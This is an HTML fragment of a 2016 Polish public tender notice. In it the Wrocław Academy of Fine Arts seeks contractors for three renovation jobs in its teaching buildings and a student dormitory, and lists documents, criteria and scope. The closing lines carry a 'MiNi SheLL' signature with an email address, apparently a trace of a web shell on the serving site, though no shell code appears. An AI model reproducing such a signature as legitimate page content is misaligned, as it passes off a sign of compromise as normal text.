<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz oferty-załącznik nr 1 do SIWZ. 2) Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów, na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli Wykonawca polegać będzie na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków (o ile dotyczy). 3) Pełnomocnictwo dla osoby/osób podpisującej/cych ofertę do podejmowania zobowiązań w imieniu Wykonawcy składającego ofertę, gdy prawo do podpisania oferty nie wynika z innych dokumentów do niej załączonych. 4) W przypadku złożenia oferty wspólnej przez kilku Wykonawców należy przedstawić pełnomocnictwo ustanawiające pełnomocnika do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu o udzielenie niniejszego zamówienia i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się, aby pełnomocnikiem był jeden z Wykonawców składających ofertę wspólną (Partnerów). Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Partnerów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany postanowień zawartej umowy możliwe będą pod warunkiem wystąpienia następujących okoliczności w trakcie realizacji umowy podstawowej: 1)w przypadku wystąpienia siły wyższej termin umowy może ulec zmianie o czas konieczny do usunięcia jej skutków. 2)w przypadku konieczności wprowadzenia zmian osób wskazanych w umowie z przyczyn niezależnych od Zamawiającego lub Wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.asp.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu, Pl. Polski 3/4, 50-156 Wrocław, Sekcja ds. Przetargów (pok.217P, II piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2016 godzina 10:00, miejsce: Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu, Pl. Polski 3/4, 50-156 Wrocław, sekretariat Kanclerza (pok. 107, I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE NR 1 REMONT POMIESZCZEŃ DYDAKTYCZNYCH W BUDYNKU ASP PRZY UL. TRAUGUTTA 21.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych - remontowych w pomieszczeniach dydaktycznych   ASP  przy ul. Traugutta 21 we Wrocławiu. Remont obejmuje pomieszczenia: - w budynku  głównym   A - 107T, 108T, 109T, 205T 304T ,305T - w budynku D - pomieszczenie nr 005D, ściana zewnętrzna szczytowa - w budynku muzeum - pomieszczenia przynależne Roboty rozbiórkowe obejmują pomieszczenia 107T,108T, 109T i 305T. W ramach prac należy wykonać następujące roboty obejmujące : - rozbiórkę ścianek działowych ścianek murowanych, - rozbiórkę ścianki działowej drewnianej, - rozbiórkę regałów drewnianych, - demontaż brodzika stalowego  - rozebranie wykładzin podłogowych - demontaż ościeżnic drzwiowych - wywóz gruzu W pracowni 107T, 108T i 109T  należy wykonać  roboty  tynkarskie,  malarskie wykładzinowe , instalacyjne elektryczne i co. W Sali 205T należy ułożyć wykładzinę  podłogową PCV typu tarket i wykonać instalacyjne elektryczne. W sali 304T wykonać prace instalacyjne co. W pracowni 305T należy wykonać roboty w zakresie wyburzenia, tynkowania, zakładania stolarki budowlanej, roboty ciesielskie, instalacyjne co oraz roboty malarskie. W budynku D w pomieszczeniu  nr 005 należy wykonać roboty tynkarskie oraz malarskie. Wykonać poziomą izolację przeciwwilgociową metodą inekcji bezciśnieniowej w murze z cegły o normalnej twardości o głębokości 65cm po obwodzie ściany. Na ścianie zewnętrznej rozebrać obróbki blacharskie i wykonać nowe. Uszczelnić styki obróbek blacharskich z murem. W budynku muzeum wykonać roboty w zakresie  zakładania stolarki budowlanej , roboty ciesielskie instalacyjne co oraz malarskie. Zamawiający nie posiada pozwolenie na budowę, gdyż nie wymagają tego przepisy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.11.00-9, 45.31.70.00-2, 45.41.00.00-4, 45.33.11.00-7, 45.43.21.11-5, 45.44.21.00-8, 45.42.00.00-7, 45.26.13.00-7, 45.26.14.20-4, 45.32.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.07.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE NR 2 REMONT POMIESZCZEŃ W BUDYNKU PRZY UL. MODRZEWSKIEGO 15/17 I PRZY PL. POLSKIM 3/4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem postępowania jest wykonanie robót budowlanych i instalacyjnych w budynkach przy ul. Modrzewskiego 15/17 i  pl. Polskim 3/4 we Wrocławiu. Remont w budynku przy ul Modrzewskiego obejmuje następujące pomieszczenia  : - Sala 104 M - malowanie ścian i sufitów farbami emulsyjnymi ,demontaż i montaż wykładzin PCV, skucie wierzchniej warstwy, wykonanie warstwy wyrównawczej ,gruntowanie posadzek, - Sala 310 M - malowanie ścian i sufitów, rur co ,  - Pracownia 200M (sala 201, korytarz i sala 2011B)- Malowanie ścian i sufitów, rur co - Sala 204 M, 209M - malowanie ścian i sufitów, rur co - Sufit korytarz na IIp.bud.M- demontaż płyt z włókiem mineralnych ,pomalowanie farbami emulsyjnymi i ponowny montaż, mycie detergentami konstrukcji stalowej sufitu. - Przedsionek Sali 117M , sala 118M i 119M - malowanie ścian i sufitów farbami emulsyjnymi, demontaż i montaż wykładzin PCV, warstwa wyrównawcza pod wykładzinę, - Sala 102M - wykonanie sufitu podwieszanego z płyt GK, montaż wentylacji, przebudowa instalacji elektrycznej z wykorzystaniem istniejących opraw, malowanie ścian i sufitów farbami emulsyjnymi, malowanie rur co, demontaż i montaż wykładzin PCV, warstwy wyrównawcze pod posadzkę z wykładziny, - Sala 103M - skucie glazury na ścianach, wykonanie gładzi gipsowych, malowanie ścian i sufitów, ułożenie wykładziny PCV, - Przedsionek przy sali 103M i 102M - malowanie ścian i sufitów, - Sala 401M,404M, 405M - przygotowanie powierzchni, malowanie farbami magnetycznymi ścian (jedno pomieszczenie), malowanie farbami emulsyjnymi ścian i sufitów  - Dziekanat AWiW 114M - malowanie ścian i sufitów farbami emulsyjnymi, rur co, demontaż wykładziny dywanowej , wyrównanie posadzek ,ułożenie wykładzin PCV, - Pokój 115M-malowanie ścian i sufitów farbami emulsyjnymi, - Dziekanat MiRZ 116M - malowanie ścian i sufitów farbami emulsyjnymi ,rur co farbami olejnymi - Przedsionek pom.114M i 115M - malowanie ścian i sufitów farbami emulsyjnymi, demontaż i montaż wykładzin PCV, warstwa wyrównawcza pod wykładzinę, - Pomieszczenie kasy 112M - montaż klimatyzatora bez jednostki zewnętrznej o mocy 2KW, próba szczelności, uruchomienie, wykonanie instalacji zasilającej klimatyzator, instalacja skroplin i kanału wentylacyjnego, roboty malarskie ścian i sufitów - Pracownia 512M/416M - montaż półek nadgrzejnikowych z konglomeratu, roboty malarskie ścian i sufitów Remont w budynku przy pl. Polskim 3/4  obejmuje następujące pomieszczenia  : - Korytarz na II piętrze bud.P- malowanie ścian farbami emulsyjnymi w kolorze szarym - Pracownia 1/2P - malowanie ścian i sufitów farbami emulsyjnymi - Pracownia 5P - rozebranie posadzki z parkietu, wykonanie posadzki cementowej wraz z cokolikami zbrojonej siatką stalową , - Pracownia 16P - malowanie ścian i sufitów farbami emulsyjnymi, malowanie cokołów, grzejników ,balustrad, stolarki drzwiowej, regałów farbami olejnymi, - Sala 115P - montaż wentylatora kanałowego wraz z instalacją zasilającą, wymiana szyby zespolonej na utwardzoną płytę PCV ,malowanie ścian i sufitów, - Pracownia 205P, 208P- malowanie ścian i sufitów, grzejników, rur kanalizacyjnych i wodociągowych, regałów, stolarki drzwiowej ,szaf metalowych, zlewu - Pracownia 209P - przecieranie tynków na ścianach i stropie, malowanie farbami emulsyjnymi ścian i sufitów, malowanie grzejników rur, regałów, stolarki drzwiowej, cyklinowanie posadzek z deszczółek, wymiana cokołów, lakierowanie, montaż i demontaż rusztowań  - Sala 318P kucie bruzd, montaż przewodów wcześniej zdemontowanych z koryt instalacyjnych, malowanie ścian i sufitów farbami emulsyjnymi , malowanie grzejników, rur kanalizacyjnych ,cyklinowanie posadzek i lakierowanie ,regulacja skrzydeł drzwiowych, - Gabinet Rektora w bud.P- demontaż korytek instalacyjnych, wykucie bruzd, ponowny montaż korytek w bruzdach, malowanie ścian i sufitów farbami emulsyjnymi, malowanie rur i grzejników farbami olejnymi, cyklinowanie i malowanie podłogi  z parkietu, malowanie lakierem drzwi , szafek ,odbudowy, - Sekretariat Rektora w bud P -  malowanie ścian i sufitów, grzejników co, rur  farbą olejną, zerwanie wykładziny dywanowej ,cyklinowanie i malowanie parkietu, lakierowanie drzwi i ościeży, - Gabinet Kanclerza w bud.P- wykucie otworu drzwiowego, wykucie ościeżnicy i  montaż w nowym otworze drzwiowym, malowanie ścian i sufitów farbą emulsyjną , malowanie grzejników i rur co, - Pracownia 321P- wymiana szyby zespolonej, montaż wentylatora wraz z instalacją elektryczną, malowanie ścian i sufitów farbami emulsyjnymi, rur kanalizacyjnych, wymiana zlewozmywaka, wymiana podejścia pod zlewozmywak, wymiana syfonu, montaż szafki pod zlewozmywak, - Sala 203P- dostawa i montaż klimatyzatora na konstrukcji podporowej, montaż instalacji skroplin i kanału wentylacyjnego, próba szczelności, uruchomienie ,wykonanie instalacji zasilającej, malowanie ścian i sufitów, montaż szafki meblowej   według załączonych   szkiców, - Sala 204P - demontaż -przebudowa konstrukcji podporowej montaż linek stalowych balustrady antresoli, malowanie farbami olejnymi konstrukcji, malowanie starych tynków wewnętrznych, montaż wykładziny z tworzyw sztucznych, uzupełnienie gładzi cementowej, ułożenie paneli podłogowych  - Sala 313P- montaż i demontaż stolarki drzwiowej, wykucie otworu drzwiowego, wykonanie przesklepień, wykonanie ścianki działowej z płyt GK, montaż instalacji elektrycznej gniazd, wyłączników, montaż rozdzielnicy elektrycznej, wykucie i montaż bruzd, kładzenie wykładzin z tworzyw sztucznych ,wykonanie warstw wyrównawczych pod posadzkami, malowanie ścian i sufitów , malowanie stolarki drzwiowej  Uwagi ogólne :  Litera M wskazuje lokalizację pomieszczenia w budynku przy ul. Modrzewskiego 15/17. Litera P wskazuje lokalizację pomieszczenia w budynku przy pl. Polskim 3/4. We wszystkich pomieszczeniach znajduje się wyposażenie, które na czas remontu należy wynieść i ponownie wnieść po  zakończeniu robot. Posadzki, stolarkę okienną i drzwiową w pomieszczeniach w których będzie prowadzony remont należy zabezpieczyć przed zniszczeniem. Wyłączniki, gniazda na ścianach przed malowaniem należy zdemontować i ponownie zamontować po robotach malarskich. Należy uwzględnić transport gruzu i materiałów z demontażu do miejsca składowania i wywiezienia na wysypisko śmieci. Prace malarskie poprzedzają roboty przygotowawcze drobne naprawy, szpachlowanie, demontaże sprzętu, obrazów i tp. Sprzęt elektroniczny zostaje zabezpieczony i przeniesiony przez Inwestora we własnym zakresie. Zamawiający nie posiada pozwolenie na budowę , gdyż nie wymagają tego przepisy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.41.00.00-4, 45.44.21.00-8, 45.42.00.00-7, 45.33.20.00-3, 45.43.21.11-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.07.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE NR 3 REMONT POMIESZCZEŃ W DOMU STUDENCKIM PRZY UL. POBOŻNEGO 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem postępowania przetargowego jest wykonanie robót budowlanych i instalacyjnych  w  Domu Studenckim przy ul. H. Pobożnego 9 we Wrocławiu.  Remont obejmuje następujące pomieszczenia : - łazienka przy pokoju 102 - prace instalacyjne wodne i kanalizacyjne, uszczelniające silikonem urządzenia muszli, umywalki brodzik i wpusty w podłodze, - korytarz parteru- kasowanie zacieków, roboty malarskie ścian i sufitu, prace demontażowe, - klatka schodowa parteru-rowerowia - roboty malarskie ścian, sufitów, rur wodociągowych, - łazienki ogólnodostępne na IIIp i IVp - roboty instalacyjne demontażowe i montażowe baterii, brodzika i podejść oraz roboty malarskie farbami emulsyjnymi ścian i sufitów - łazienki ogólnodostępne na V p- wymiana baterii i silikonu uszczelniającego urządzenia sanitarne, czyszczenie ręczne płytek terakotowych, - magazyn na IIp - wymiana obudowy z płyt GK w miejscach wykonywanych podejść sanitarnych, malowanie ścian i sufitów, - kuchnia IIIp- roboty demontażowe, transportowe, wymiana blatów kuchennych połączona z wycinaniem otworów na płytę kuchenki i zlewozmywak, - pracownia Ip, i IIp- roboty transportowe, malowanie ścian i sufitów, rur ,stolarki drzwiowej, demontaż i montaż wykładzin PCV - pokój 401, 402, 403A, 403B, przedsionka pokoju 403, 404, 405, 501, 502, 503A, 503B, 504 505, 602, -przygotowanie powierzchni, roboty demontażowe, malowanie ścian i sufitów farbami emulsyjnymi, rur kanalizacyjnych,odkręcanie zamocowanych łóżek, demontaż i montaż wyłączników i gniazd, - kuchnia na Vp- malowanie ścian i sufitów farbami emulsyjnymi. Uwagi ogólne :  We wszystkich pomieszczeniach znajduję się wyposażenie, które na czas remontu należy wynieść i ponownie wnieść po zakończeniu robot. Posadzki, stolarkę okienną i drzwiową  w pomieszczeniach w których będzie prowadzony remont należy zabezpieczyć przed zniszczeniem. Wyłączniki, gniazda na ścianach przed malowaniem należy zdemontować i ponownie zamontować po robotach malarskich. Należy uwzględnić transport gruzu i materiałów z demontażu do miejsca składowania i wywiezienia na wysypisko śmieci.   Zamawiający nie posiada pozwolenie na budowę , gdyż nie wymagają tego przepisy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.44.21.00-8, 45.42.00.00-7, 45.33.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.07.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com